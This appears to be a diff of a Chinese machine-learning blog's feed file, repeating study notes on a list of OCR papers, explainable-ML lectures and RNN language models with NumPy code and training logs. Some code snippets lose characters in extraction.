    18SPN: short path network for scene text detectionJournals Chttps://link.springer.com/article/10.1007/s00521-019-04093-0场景文本检测
    19Robustly detect different types of text in videosJournals Chttps://link.springer.com/article/10.1007/s00521-020-04729-6视频文本检测(叠加文本、分层文本和场景文本)
    20Effective offline handwritten text recognition model based on a sequence-to-sequence approach with CNN-RNN networksJournals Chttps://link.springer.com/article/10.1007/s00521-020-05556-5手写文本识别、使用 CNN 提取特征、RNN-LSTM 以编码视觉特征和解码手写图像中可用的字母序列。
    21Historical document image binarization via style augmentation and atrous convolutionsJournals Chttps://link.springer.com/article/10.1007/s00521-020-05382-9使用神经网络方法对历史文献进行二值化
    22Character-based handwritten text transcription with attention networksJournals Chttps://paperswithcode.com/paper/attention-networks-for-image-to-text使用在字符序列而非单词序列上训练的注意力编码器-解码器网络来处理手写文本识别 (HTR) 的任务
    23Compressing the CNN architecture for in-air handwritten Chinese character recognitionJournals Chttps://www.sciencedirect.com/science/article/abs/pii/S0167865519303502提出了一种统一的算法来有效压缩 IAHCCR 的 CNN,引入到**空中手写汉字识别(IAHCCR)**中以获得更好的识别性能。
    24LPR-Net: Recognizing Chinese license plate in complex environmentsJournals Chttps://www.sciencedirect.com/science/article/abs/pii/S0167865518306998车牌识别网 (LPR-Net) 的端到端深度学习架构直接识别车牌
    25An attention-based row-column encoder-decoder model for text recognition in Japanese historical documentsJournals Chttps://www.sciencedirect.com/science/article/abs/pii/S0167865520301811识别来自日本历史文档的多个文本行的输入图像,而无需对行进行显式分割。识别系统具有三个主要部分:特征提取器、行列编码器和解码器。
    26Assessing similarity in handwritten textsJournals Chttps://www.sciencedirect.com/science/article/abs/pii/S0167865520303093合成手写风格字体
    27Clustering online handwritten mathematical expressionsJournals Chttps://www.sciencedirect.com/science/article/abs/pii/S0167865521001148在线手写数学表达式
    28Beyond visual semantics: Exploring the role of scene text in image understandingJournals Chttps://arxiv.org/abs/1905.10622联合使用场景文本和视觉通道来对图像进行稳健的语义解释
    29PMMN: Pre-trained multi-Modal network for scene text recognitionJournals Chttps://www.sciencedirect.com/science/article/abs/pii/S0167865521002622提出了一种预训练多模态网络 (PMMN),它利用视觉和语言数据分别预训练视觉模型和语言模型,以学习特定于模态的知识,以进行准确的场景文本识别
    30RectiNet-v2: A stacked network architecture for document image dewarpingJournals Chttps://arxiv.org/abs/2102.01120提出了一种端到端的 CNN 架构,该架构可以从作为输入的扭曲文档中生成无失真的文档图像
    31Transformer-based approach for joint handwriting and named entity recognition in historical documentJournals Chttps://arxiv.org/abs/2112.04189手写文档中提取相关信息
    32Cross lingual handwritten character recognition using long short term memory network with aid of elephant herding optimization algorithmJournals Chttps://www.sciencedirect.com/science/article/abs/pii/S0167865522001490手写字符识别
    33CE-text: A context-Aware and embedded text detector in natural scene imagesJournals Chttps://www.sciencedirect.com/science/article/abs/pii/S0167865522001556提出了一种名为 CE-Text 的轻量级上下文感知深度卷积神经网络 (CNN),它适当地编码多级通道注意力信息以构建用于准确高效文本检测的判别特征图。
    34OmniPrint: A configurable printed character synthesizerConf Ahttps://paperswithcode.com/paper/omniprint-a-configurable-printed-character独立印刷字符的合成数据生成器,适用于机器学习研究
    35Are transformers more robust than CNNs?Conf Ahttps://paperswithcode.com/paper/are-transformers-more-robust-than-cnnsTransformerCNN 进行公平和深入的比较,重点是稳健性评估。
    36Diffusion models beat GANs on image synthesisConf Ahttps://paperswithcode.com/paper/diffusion-models-beat-gans-on-image-synthesis扩散模型可以实现优于当前最先进的生成模型的图像样本质量
    37Cleaning dirty books: Post-OCR processing for previously scanned textsConf Bhttps://paperswithcode.com/paper/cleaning-dirty-books-post-ocr-processing-for语言模型的改进现在可以在不考虑扫描图像本身的情况下检测和纠正 OCR 错误
    38Accurate arbitrary-shaped scene text detection via iterative polynomial parameter regressionConf Chttps://link.springer.com/chapter/10.1007/978-3-030-69535-4_15针对任意形状的文本提出了一种基于参数化形状建模和回归方案的鲁棒场景文本检测方法
    ]]>
    @@ -7820,7 +7820,7 @@ /posts/ML-%E6%9D%8E%E5%AE%8F%E6%AF%85-Lecture%209-Explainable%20AI/ - Preparation

    ##【機器學習 2021】機器學習模型的可解釋性 -Explainable ML- -上- – 為什麼類神經網路可以正確分辨寶可夢和數碼寶貝呢?

    png

    ​ 有时候机器得到正确的答案,并不代表它真正地理解了这个问题。

    png

    Why we need Explainable ML?

    • Loan issuers are required by law to explain their models.
      • 法律要求贷款发放者解释其模式。
    • Medical diagnosis model is responsible for humanlife. Can it be a black box?
      • 医学诊断模式对人类生活负责。它可以是一个黑盒子吗?
    • If a model is used at the court, we must make surethe model behaves in a nondiscriminatory manner.
      • 如果在法庭上使用一个模型,我们必须确保该模型以非歧视性的方式行事。
    • If a self-driving car suddenly acts abnormally, weneed to explain why.
      • 如果一辆自动驾驶汽车突然出现异常行为,我们需要解释原因。

    png

    ​ 我们可以基于模型的解释调整模型性能。

    png

    • 一些模型具有内在的可解释性。
      • 比如线性模型
      • 但是一般都不复杂。
    • 深度学习网络难以解释。深度学习网络是一个黑盒,但是比线性模型更强大。

    png

    ​ 我们尝试让深度学习网络更具解释性。

    png

    ​ 决策树是一个强大且可解释的模型。

    png

    解释性学习的目标

    • 完全知道 ML 模型的工作原理?
    • 我们并不完全知道大脑是如何工作的!
    • 但是我们相信人类的判断!

    png

    png

    ​ 机器学习的可解释性分为两大类:

    • Local Explanation
      • 为什么你觉得这张图片是一只猫?
    • Global Explanation
      • 这只猫像什么?(不是指具体的图像)

    Local Explanation:Explain the Decision

    png

    png

    Image2Text 问题。究竟是猫的哪些部分被机器识别出来让机器认为这张图片是一张猫?

    png

    ​ 论文 [1311.2901] Visualizing and Understanding Convolutional Networks (arxiv.org) 使用一张灰色正方形遮盖图片,判断机器是否真正理解了图片内容。

    png

    ​ 使用 Saliency Map:[1312.6034] Deep Inside Convolutional Networks: Visualising Image Classification Models and Saliency Maps (arxiv.org) 让机器的关注点显现。

    png

    ​ 案例:让机器识别是宝可梦还是神奇宝贝。

    png

    png

    model = Sequential()model.add(Conv2D(32,(33),padding='same',input_shape(120,120,3)))
    model.add(Activation('relu'))model.add(Conv2D(32,(33)))
    model.add(Activation('relu'))model.add(MaxPooling2D(pool_size=(22)))
    model.add(Conv2D(64,(33),padding='same'))
    model.add(Activation('relu'))
    model.add(Conv2D(64,(33)))
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(22)))
    model.add(Conv2D(256,(33),padding='same'))
    model.add(Activation('relu'))
    model.add(Conv2D(256,(33)))
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(22)))
    model.add(Flatten())
    model.add(Dense(1024))
    model.add(Activation('relu'))
    model.add(Dense(2))model.add(Activation('softmax'))

    ​ 写一个卷积神经网络,结果它的效果非常好!

    png

    png

    ​ 绘制它们的 Saliency Map,发现机器的关注点都在背景上 orz

    png

    ​ 后来发现是两个数据集的背景颜色不同,导致机器学到了错误的知识。

    png

    png

    ​ 给图片添加随机噪声,绘制它们的 Saliency Map 并求平均值。[1603.02518] A New Method to Visualize Deep Neural Networks (arxiv.org)

    png

    ​ 梯度未必能反应重要程度。

    ​ 替代:[1611.02639] Gradients of Counterfactuals (arxiv.org)

    png

    • 网络是如何处理输入数据的?
      • 把一个深度神经网络中间的几层拿出来看看长啥样。

    png

    ​ 在经过 8 层隐藏层之后,逐渐把不同人说的同一个句子聚集在一起。icassp12_dbn.pdf (toronto.edu)

    png

    ​ 论文 [1902.10186] Attention is not Explanation (arxiv.org) 认为 Attention 机制不能被解释。

    ​ 论文 [1908.04626] Attention is not not Explanation (arxiv.org) 认为有些 Attention 机制能被解释。

    png

    ​ 在 BERT 模型中用一个 POS / NER 分类器,但是这个分类器不能太强,不然识别率会很低。

    png

    png

    ​ 语音识别:把中间结果拿出来。[1911.01102] What does a network layer hear? Analyzing hidden representations of end-to-end ASR through speech synthesis (arxiv.org)

    ##【機器學習 2021】機器學習模型的可解釋性 -Explainable ML- -下- –機器心中的貓長什麼樣子?

    Global Explanation

    png

    ​ 在卷积神经网络中,filter 都提取了哪些特征?

    png

    png

    png

    ​ 直接把卷积神经网络中间的特征图拿出来($X*=arg\max_Xy_i$)会发现难以理解,加上一些图像原来的特征($X*=arg\max_X y_i+R(X), R(X)=\sum_{i,j}|X_{ij}|$)。

    png

    ​ 有了这些,我们就可以更好地调整超参数。[1506.06579] Understanding Neural Networks Through Deep Visualization (arxiv.org)

    png

    png

    png

    ​ 用一个简单的模型模拟深层神经网络生成的结果,然后这个简单的模型就容易被解释。

    png

    ]]>
    + Preparation

    ##【機器學習 2021】機器學習模型的可解釋性 -Explainable ML- -上- – 為什麼類神經網路可以正確分辨寶可夢和數碼寶貝呢?

    png

    ​ 有时候机器得到正确的答案,并不代表它真正地理解了这个问题。

    png

    Why we need Explainable ML?

    • Loan issuers are required by law to explain their models.
      • 法律要求贷款发放者解释其模式。
    • Medical diagnosis model is responsible for humanlife. Can it be a black box?
      • 医学诊断模式对人类生活负责。它可以是一个黑盒子吗?
    • If a model is used at the court, we must make surethe model behaves in a nondiscriminatory manner.
      • 如果在法庭上使用一个模型,我们必须确保该模型以非歧视性的方式行事。
    • If a self-driving car suddenly acts abnormally, weneed to explain why.
      • 如果一辆自动驾驶汽车突然出现异常行为,我们需要解释原因。

    png

    ​ 我们可以基于模型的解释调整模型性能。

    png

    • 一些模型具有内在的可解释性。
      • 比如线性模型
      • 但是一般都不复杂。
    • 深度学习网络难以解释。深度学习网络是一个黑盒,但是比线性模型更强大。

    png

    ​ 我们尝试让深度学习网络更具解释性。

    png

    ​ 决策树是一个强大且可解释的模型。

    png

    解释性学习的目标

    • 完全知道 ML 模型的工作原理?
    • 我们并不完全知道大脑是如何工作的!
    • 但是我们相信人类的判断!

    png

    png

    ​ 机器学习的可解释性分为两大类:

    • Local Explanation
      • 为什么你觉得这张图片是一只猫?
    • Global Explanation
      • 这只猫像什么?(不是指具体的图像)

    Local Explanation:Explain the Decision

    png

    png

    Image2Text 问题。究竟是猫的哪些部分被机器识别出来让机器认为这张图片是一张猫?

    png

    ​ 论文 [1311.2901] Visualizing and Understanding Convolutional Networks (arxiv.org) 使用一张灰色正方形遮盖图片,判断机器是否真正理解了图片内容。

    png

    ​ 使用 Saliency Map:[1312.6034] Deep Inside Convolutional Networks: Visualising Image Classification Models and Saliency Maps (arxiv.org) 让机器的关注点显现。

    png

    ​ 案例:让机器识别是宝可梦还是神奇宝贝。

    png

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    model = Sequential()model.add(Conv2D(32,(33),padding='same',input_shape(120,120,3)))
    model.add(Activation('relu'))model.add(Conv2D(32,(33)))
    model.add(Activation('relu'))model.add(MaxPooling2D(pool_size=(22)))
    model.add(Conv2D(64,(33),padding='same'))
    model.add(Activation('relu'))
    model.add(Conv2D(64,(33)))
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(22)))
    model.add(Conv2D(256,(33),padding='same'))
    model.add(Activation('relu'))
    model.add(Conv2D(256,(33)))
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(22)))
    model.add(Flatten())
    model.add(Dense(1024))
    model.add(Activation('relu'))
    model.add(Dense(2))model.add(Activation('softmax'))

    ​ 写一个卷积神经网络,结果它的效果非常好!

    png

    png

    ​ 绘制它们的 Saliency Map,发现机器的关注点都在背景上 orz

    png

    ​ 后来发现是两个数据集的背景颜色不同,导致机器学到了错误的知识。

    png

    png

    ​ 给图片添加随机噪声,绘制它们的 Saliency Map 并求平均值。[1603.02518] A New Method to Visualize Deep Neural Networks (arxiv.org)

    png

    ​ 梯度未必能反应重要程度。

    ​ 替代:[1611.02639] Gradients of Counterfactuals (arxiv.org)

    png

    • 网络是如何处理输入数据的?
      • 把一个深度神经网络中间的几层拿出来看看长啥样。

    png

    ​ 在经过 8 层隐藏层之后,逐渐把不同人说的同一个句子聚集在一起。icassp12_dbn.pdf (toronto.edu)

    png

    ​ 论文 [1902.10186] Attention is not Explanation (arxiv.org) 认为 Attention 机制不能被解释。

    ​ 论文 [1908.04626] Attention is not not Explanation (arxiv.org) 认为有些 Attention 机制能被解释。

    png

    ​ 在 BERT 模型中用一个 POS / NER 分类器,但是这个分类器不能太强,不然识别率会很低。

    png

    png

    ​ 语音识别:把中间结果拿出来。[1911.01102] What does a network layer hear? Analyzing hidden representations of end-to-end ASR through speech synthesis (arxiv.org)

    ##【機器學習 2021】機器學習模型的可解釋性 -Explainable ML- -下- –機器心中的貓長什麼樣子?

    Global Explanation

    png

    ​ 在卷积神经网络中,filter 都提取了哪些特征?

    png

    png

    png

    ​ 直接把卷积神经网络中间的特征图拿出来($X*=arg\max_Xy_i$)会发现难以理解,加上一些图像原来的特征($X*=arg\max_X y_i+R(X), R(X)=\sum_{i,j}|X_{ij}|$)。

    png

    ​ 有了这些,我们就可以更好地调整超参数。[1506.06579] Understanding Neural Networks Through Deep Visualization (arxiv.org)

    png

    png

    png

    ​ 用一个简单的模型模拟深层神经网络生成的结果,然后这个简单的模型就容易被解释。

    png

    ]]>
    @@ -7928,7 +7928,7 @@ /posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E8%BF%9B%E9%98%B6-%E8%87%AA%E7%84%B6%E8%AF%AD%E8%A8%80%E5%A4%84%E7%90%86-5-RNN/ - 前言

    虽然前馈网络结构简单、易于理解,但是可以应用于许多任务中。不过,这种网络存在一个大问题,就是不能很好地处理时间序列数据(以下简称为“时序数据”)。更确切地说,单纯的前馈网络无法充分学习时序数据的性质(模式)。于是,**RNN(Recurrent Neural Network,循环神经网络)**便应运而生。

    正文

    5.1 概率和语言模型

    5.1.1 概率视角下的 word2vec

    复习一下 word2vec 的 CBOW 模型。这里,我们来考虑由单词序列 $w_1,w_2,…,w_T$ 表示的语料库,将第 $t$ 个单词作为目标词,将它左右的(第 $t-1$ 个和第 $t+1$ 个)单词作为上下文。

    用数学式来表示“当给定 $w_{t−1}$ 和 $w_{t+1}$ 时目标词是 $w_t$ 的概率”:

    $$P(w_t|w_{t-1}, w_{t+1})$$

    CBOW 模型的损失函数:

    $$L=-\log P(w_t|w_{t-2}, w_{t-1})$$

    5.1.2 语言模型

    **语言模型(language model)**给出了单词序列发生的概率。

    由 $P (w_t|w_1,…,w_{t−1})$ 表示的模型称为条件语言模型(conditional language model),有时也将其称为语言模型。

    5.1.3 将 CBOW 模型用作语言模型?

    $$P(w_1, …, w_m)=\prod_{t=1}^{m}P(w_t|w_1,…,w_{t-1}) \approx \prod_{t=1}^{m}P(w_t|w_{t-2},w_{t-1})$$

    我们将上下文限定为左侧的 2 个单词。如此一来,就可以用 CBOW 模型(CBOW 模型的后验概率)近似表示。

    在机器学习和统计学领域,经常会听到“马尔可夫性”(或者“马尔可夫模型”“马尔可夫链”)这个词。马尔可夫性是指未来的状态仅依存于当前状态。此外,当某个事件的概率仅取决于其前面的 N 个事件时,称为“N 阶马尔可夫链”。这里展示的是下一个单词仅取决于前面 2 个单词的模型,因此可以称为“2 阶马尔可夫链”。

    5.2 RNN

    5.2.1 循环的神经网络

    RNN 的特征就在于拥有这样一个环路(或回路)。这个环路可以使数据不断循环。通过数据的循环,RNN 一边记住过去的数据,一边更新到最新的数据。

    png

    5.2.2 展开循环

    png

    各个时刻的 RNN 层接收传给该层的输入和前一个 RNN 层的输出,然后据此计算当前时刻的输出,此时进行的计算可以用下式表示:

    $$h_t=\tanh(h_{t-1}W_h+x_tW_x+b)$$

    RNN 的 $h$ 存储“状态”,时间每前进一步(一个单位),它就以上式的形式被更新。许多文献中将 RNN 的输出 $h_t$ 称为隐藏状态(hidden state)隐藏状态向量(hidden state vector),本书中也是如此。

    5.2.3 Backpropagation Through Time

    将循环展开后的 RNN 可以使用(常规的)误差反向传播法。换句话说,可以通过先进行正向传播,再进行反向传播的方式求目标梯度。因为这里的误差反向传播法是“按时间顺序展开的神经网络的误差反向传播法”,所以称为 Backpropagation Through Time(基于时间的反向传播),简称BPTT

    5.2.4 Truncated BPTT

    在处理长时序数据时,通常的做法是将网络连接截成适当的长度。具体来说,就是将时间轴方向上过长的网络在合适的位置进行截断,从而创建多个小型网络,然后对截出来的小型网络执行误差反向传播法,这个方法称为 Truncated BPTT(截断的 BPTT)。

    Truncated 是“被截断”的意思。Truncated BPTT 是指按适当长度截断的误差反向传播法。

    5.2.5 Truncated BPTT 的 mini-batch 学习

    png

    通过 Truncated BPTT 进行学习的例子,对长度为 1000 的时序数据,以时间长度 10 为单位进行截断。此时,如何将批大小设为 2 进行学习呢?在这种情况下,作为 RNN 层的输入数据,第 1 笔样本数据从头开始按顺序输入,第 2 笔数据从第 500 个数据开始按顺序输入。也就是说,将开始位置平移 500。

    5.3 RNN 的实现

    png

    png

    $$h_t=\tanh(h_{t-1}W_h+x_tW_x+b)$$

    class RNN:
    def __init__(self, Wx, Wh, b):
    self.params = [Wx, Wh, b]
    self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)]
    self.cache = None


    def forward(self, x, h_prev):
    """
    x: 从下方输入的数据
    h_prev: 从左边输入的数据
    """
    Wx, Wh, b = self.params
    t = np.dot(h_prev, Wh) + np.dot(x, Wx) + b
    h_next = np.tanh(t)
    self.cache = (x, h_prev, h_next)
    return h_next # 当前时刻的 RNN 层的输出(= 下一时刻的 RNN 层的输入)是 h_next


    def backward(self, dh_next):
    Wx, Wh, b = self.params
    x, h_prev, h_next = self.cache

    dt = dh_next * (1 - h_next ** 2)
    db = np.sum(dt, axis=0)
    dWh = np.dot(h_prev.T, dt)
    dh_prev = np.dot(dt, Wh.T)
    dWx = np.dot(x.T, dt)
    dx = np.dot(dt, Wx.T)

    self.grads[0][...] = dWx
    self.grads[1][...] = dWh
    self.grads[2][...] = db
    return dx, dh_prev

    5.3.2 Time RNN 层的实现

    Time RNN 层是 T 个 RNN 层连接起来的网络。我们将这个网络实现为 Time RNN 层。这里,RNN 层的隐藏状态 h 保存在成员变量中。

    class TimeRNN:
    def __init__(self, Wx, Wh, b, stateful=False):
    """
    layers: 在列表中保存多个 RNN 层
    h: 保存调用 forward() 方法时的最后一个 RNN 层的隐藏状态
    """
    self.params = [Wx, Wh, b]
    self.grads = [np.zeros_like(Wx), np.zeros_like(Wh),
    np.zeros_like(b)]
    self.layers = None
    self.h, self.dh = None, None
    self.stateful = stateful


    def set_state(self, h):
    self.h = h


    def reset_state(self):
    self.h = None


    def forward(self, xs):
    Wx, Wh, b = self.params
    N, T, D = xs.shape
    D, H = Wx.shape

    self.layers = []
    hs = np.empty((N, T, H), dtype='f')

    if not self.stateful or self.h is None:
    self.h = np.zeros((N, H), dtype='f')

    for t in range(T):
    layer = RNN(*self.params)
    self.h = layer.forward(xs[:, t, :], self.h)
    hs[:, t, :] = self.h
    self.layers.append(layer)
    return hs


    def backward(self, dhs):
    Wx, Wh, b = self.params
    N, T, H = dhs.shape
    D, H = Wx.shape

    dxs = np.empty((N, T, D), dtype='f')
    dh = 0
    grads = [0, 0, 0]
    for t in reversed(range(T)):
    layer = self.layers[t]
    dx, dh = layer.backward(dhs[:, t, :] + dh) # 求和后的梯度
    dxs[:, t, :] = dx

    for i, grad in enumerate(layer.grads):
    grads[i] += grad

    for i, grad in enumerate(grads):
    self.grads[i][...] = grad
    self.dh = dh

    return dxs

    5.4 处理时序数据的层的实现

    我们将基于 RNN 的语言模型称为 RNNLM(RNN Language Model,RNN 语言模型)

    5.4.1 RNNLM 的全貌图

    png

    5.4.2 Time 层的实现

    实现为了 Time RNN 层,这里也同样使用 Time Embedding 层、Time Affine 层等来实现整体处理时序数据的层。

    5.5 RNNLM 的学习和评价

    5.5.1 RNNLM 的实现

    import sys
    sys.path.append('..')
    import numpy as np
    from common.time_layers import *


    class SimpleRnnlm:
    def __init__(self, vocab_size, wordvec_size, hidden_size):
    V, D, H = vocab_size, wordvec_size, hidden_size
    rn = np.random.randn
    # 初始化权重
    embed_W = (rn(V, D) / 100).astype('f')
    rnn_Wx = (rn(D, H) / np.sqrt(D)).astype('f')
    rnn_Wh = (rn(H, H) / np.sqrt(H)).astype('f')
    rnn_b = np.zeros(H).astype('f')
    affine_W = (rn(H, V) / np.sqrt(H)).astype('f')
    affine_b = np.zeros(V).astype('f')

    # 生成层
    self.layers = [
    TimeEmbedding(embed_W),
    TimeRNN(rnn_Wx, rnn_Wh, rnn_b, stateful=True),
    TimeAffine(affine_W, affine_b)
    ]
    self.loss_layer = TimeSoftmaxWithLoss()
    self.rnn_layer = self.layers[1]

    # 将所有的权重和梯度整理到列表中
    self.params, self.grads = [], []
    for layer in self.layers:
    self.params += layer.params
    self.grads += layer.grads


    def forward(self, xs, ts):
    for layer in self.layers:
    xs = layer.forward(xs)
    loss = self.loss_layer.forward(xs, ts)
    return loss


    def backward(self, dout=1):
    dout = self.loss_layer.backward(dout)
    for layer in reversed(self.layers):
    dout = layer.backward(dout)
    return dout


    def reset_state(self):
    self.rnn_layer.reset_state()

    5.5.2 语言模型的评价

    **困惑度(perplexity)**常被用作评价语言模型的预测性能的指标。困惑度表示“概率的倒数”(这个解释在数据量为 1 时严格一
    致)。

    “模型 1”能准确地预测,困惑度是 1.25;“模型 2”的预测未能命中,困惑度是 5.0。此例表明,困惑度越小越好。

    在输入数据为多个时:

    $$L=-\frac{1}{N}\sum_n\sum_kt_{nk}\log y_{nk}\ 困惑度=e^L$$

    $N$:数据量

    $t_n$:one-hot 向量形式的正确解标签

    $t_{nk}$:第 $n$ 个数据的第 $k$ 个值

    $y_{nk}$:概率分布(神经网络中的 Softmax 的输出)

    5.5.3 RNNLM 的学习代码

    下面,我们使用 PTB 数据集进行学习,不过这里仅使用 PTB 数据集(训练数据)的前 1000 个单词。这是因为在本节实现的 RNNLM 中,即便使用所有的训练数据,也得不出好的结果。

    import sys
    sys.path.append('..')
    import matplotlib.pyplot as plt
    import numpy as np
    from common.optimizer import SGD
    from dataset import ptb


    # 设定超参数
    batch_size = 10
    wordvec_size = 100
    hidden_size = 100
    time_size = 5 # Truncated BPTT 的时间跨度大小
    lr = 0.1
    max_epoch = 100

    # 读入训练数据(缩小了数据集)
    corpus, word_to_id, id_to_word = ptb.load_data('train')
    corpus_size = 1000
    corpus = corpus[:corpus_size]
    vocab_size = int(max(corpus) + 1)

    xs = corpus[:-1] # 输入
    ts = corpus[1:] # 输出(监督标签)
    data_size = len(xs)
    print('corpus size: %d, vocabulary size: %d' % (corpus_size, vocab_size))

    # 学习用的参数
    max_iters = data_size // (batch_size * time_size)
    time_idx = 0
    total_loss = 0
    loss_count = 0
    ppl_list = []

    # 生成模型
    model = SimpleRnnlm(vocab_size, wordvec_size, hidden_size)
    optimizer = SGD(lr)

    # 计算读入 mini-batch 的各笔样本数据的开始位置
    jump = (corpus_size - 1) // batch_size
    offsets = [i * jump for i in range(batch_size)]

    for epoch in range(max_epoch):
    for iter in range(max_iters):
    # 获取 mini-batch
    batch_x = np.empty((batch_size, time_size), dtype='i')
    batch_t = np.empty((batch_size, time_size), dtype='i')
    for t in range(time_size):
    for i, offset in enumerate(offsets):
    batch_x[i, t] = xs[(offset + time_idx) % data_size]
    batch_t[i, t] = ts[(offset + time_idx) % data_size]
    time_idx += 1

    # 计算梯度,更新参数
    loss = model.forward(batch_x, batch_t)
    model.backward()
    optimizer.update(model.params, model.grads)
    total_loss += loss
    loss_count += 1

    # 各个 epoch 的困惑度评价
    ppl = np.exp(total_loss / loss_count)
    print('| epoch %d | perplexity %.2f'
    % (epoch+1, ppl))
    ppl_list.append(float(ppl))
    total_loss, loss_count = 0, 0

    # 绘制图形
    x = np.arange(len(ppl_list))
    plt.plot(x, ppl_list, label='train')
    plt.xlabel('epochs')
    plt.ylabel('perplexity')
    plt.show()
    corpus size: 1000, vocabulary size: 418| epoch 1 | perplexity 381.82| epoch 2 | perplexity 249.18| epoch 3 | perplexity 221.29| epoch 4 | perplexity 215.43| epoch 5 | perplexity 207.15| epoch 6 | perplexity 203.17| epoch 7 | perplexity 198.93| epoch 8 | perplexity 195.85| epoch 9 | perplexity 191.45| epoch 10 | perplexity 192.29| epoch 11 | perplexity 188.65| epoch 12 | perplexity 191.66| epoch 13 | perplexity 189.51| epoch 14 | perplexity 189.71| epoch 15 | perplexity 189.52| epoch 16 | perplexity 185.28| epoch 17 | perplexity 183.06| epoch 18 | perplexity 180.49| epoch 19 | perplexity 181.37| epoch 20 | perplexity 184.87| epoch 21 | perplexity 180.87| epoch 22 | perplexity 178.83| epoch 23 | perplexity 174.18| epoch 24 | perplexity 176.73| epoch 25 | perplexity 172.20| epoch 26 | perplexity 172.87| epoch 27 | perplexity 170.56| epoch 28 | perplexity 166.38| epoch 29 | perplexity 162.95| epoch 30 | perplexity 157.38| epoch 31 | perplexity 157.81| epoch 32 | perplexity 152.31| epoch 33 | perplexity 154.94| epoch 34 | perplexity 146.07| epoch 35 | perplexity 145.13| epoch 36 | perplexity 139.85| epoch 37 | perplexity 136.63| epoch 38 | perplexity 133.32| epoch 39 | perplexity 125.23| epoch 40 | perplexity 121.62| epoch 41 | perplexity 121.58| epoch 42 | perplexity 115.46| epoch 43 | perplexity 109.48| epoch 44 | perplexity 104.39| epoch 45 | perplexity 99.35| epoch 46 | perplexity 98.50| epoch 47 | perplexity 93.12| epoch 48 | perplexity 87.29| epoch 49 | perplexity 84.13| epoch 50 | perplexity 80.55| epoch 51 | perplexity 77.43| epoch 52 | perplexity 72.89| epoch 53 | perplexity 68.34| epoch 54 | perplexity 65.69| epoch 55 | perplexity 61.66| epoch 56 | perplexity 59.06| epoch 57 | perplexity 55.59| epoch 58 | perplexity 51.44| epoch 59 | perplexity 50.10| epoch 60 | perplexity 47.76| epoch 61 | perplexity 46.54| epoch 62 | perplexity 42.07| epoch 63 | perplexity 38.95| epoch 64 | perplexity 36.56| epoch 65 | perplexity 36.69| epoch 66 | perplexity 34.47| epoch 67 | perplexity 33.12| epoch 68 | perplexity 29.81| epoch 69 | perplexity 28.68| epoch 70 | perplexity 28.15| epoch 71 | perplexity 25.35| epoch 72 | perplexity 24.31| epoch 73 | perplexity 23.32| epoch 74 | perplexity 21.55| epoch 75 | perplexity 21.12| epoch 76 | perplexity 19.21| epoch 77 | perplexity 18.71| epoch 78 | perplexity 17.76| epoch 79 | perplexity 16.01| epoch 80 | perplexity 15.20| epoch 81 | perplexity 14.74| epoch 82 | perplexity 14.76| epoch 83 | perplexity 12.86| epoch 84 | perplexity 12.45| epoch 85 | perplexity 11.71| epoch 86 | perplexity 11.20| epoch 87 | perplexity 10.99| epoch 88 | perplexity 10.09| epoch 89 | perplexity 9.84| epoch 90 | perplexity 9.20| epoch 91 | perplexity 8.68| epoch 92 | perplexity 8.12| epoch 93 | perplexity 7.94| epoch 94 | perplexity 7.49| epoch 95 | perplexity 7.43| epoch 96 | perplexity 6.77| epoch 97 | perplexity 6.63| epoch 98 | perplexity 6.58| epoch 99 | perplexity 6.19| epoch 100 | perplexity 5.84

    png

    5.5.4 RNNLM 的 Trainer 类

    • 按顺序生成 mini-batch

    • 调用模型的正向传播和反向传播

    • 使用优化器更新权重

    • 评价困惑度

    5.6 小结

    • RNN 具有环路,因此可以在内部记忆隐藏状态

    • 通过展开 RNN 的循环,可以将其解释为多个 RNN 层连接起来的神经网络,可以通过常规的误差反向传播法进行学习(= BPTT)

    • 在学习长时序数据时,要生成长度适中的数据块,进行以块为单位的 BPTT 学习(= Truncated BPTT)

    • Truncated BPTT 只截断反向传播的连接

    • 在 Truncated BPTT 中,为了维持正向传播的连接,需要按顺序输入数据

    • 语言模型将单词序列解释为概率

    • 理论上,使用 RNN 层的条件语言模型可以记忆所有已出现单词的信息

    ]]>
    + 前言

    虽然前馈网络结构简单、易于理解,但是可以应用于许多任务中。不过,这种网络存在一个大问题,就是不能很好地处理时间序列数据(以下简称为“时序数据”)。更确切地说,单纯的前馈网络无法充分学习时序数据的性质(模式)。于是,**RNN(Recurrent Neural Network,循环神经网络)**便应运而生。

    正文

    5.1 概率和语言模型

    5.1.1 概率视角下的 word2vec

    复习一下 word2vec 的 CBOW 模型。这里,我们来考虑由单词序列 $w_1,w_2,…,w_T$ 表示的语料库,将第 $t$ 个单词作为目标词,将它左右的(第 $t-1$ 个和第 $t+1$ 个)单词作为上下文。

    用数学式来表示“当给定 $w_{t−1}$ 和 $w_{t+1}$ 时目标词是 $w_t$ 的概率”:

    $$P(w_t|w_{t-1}, w_{t+1})$$

    CBOW 模型的损失函数:

    $$L=-\log P(w_t|w_{t-2}, w_{t-1})$$

    5.1.2 语言模型

    **语言模型(language model)**给出了单词序列发生的概率。

    由 $P (w_t|w_1,…,w_{t−1})$ 表示的模型称为条件语言模型(conditional language model),有时也将其称为语言模型。

    5.1.3 将 CBOW 模型用作语言模型?

    $$P(w_1, …, w_m)=\prod_{t=1}^{m}P(w_t|w_1,…,w_{t-1}) \approx \prod_{t=1}^{m}P(w_t|w_{t-2},w_{t-1})$$

    我们将上下文限定为左侧的 2 个单词。如此一来,就可以用 CBOW 模型(CBOW 模型的后验概率)近似表示。

    在机器学习和统计学领域,经常会听到“马尔可夫性”(或者“马尔可夫模型”“马尔可夫链”)这个词。马尔可夫性是指未来的状态仅依存于当前状态。此外,当某个事件的概率仅取决于其前面的 N 个事件时,称为“N 阶马尔可夫链”。这里展示的是下一个单词仅取决于前面 2 个单词的模型,因此可以称为“2 阶马尔可夫链”。

    5.2 RNN

    5.2.1 循环的神经网络

    RNN 的特征就在于拥有这样一个环路(或回路)。这个环路可以使数据不断循环。通过数据的循环,RNN 一边记住过去的数据,一边更新到最新的数据。

    png

    5.2.2 展开循环

    png

    各个时刻的 RNN 层接收传给该层的输入和前一个 RNN 层的输出,然后据此计算当前时刻的输出,此时进行的计算可以用下式表示:

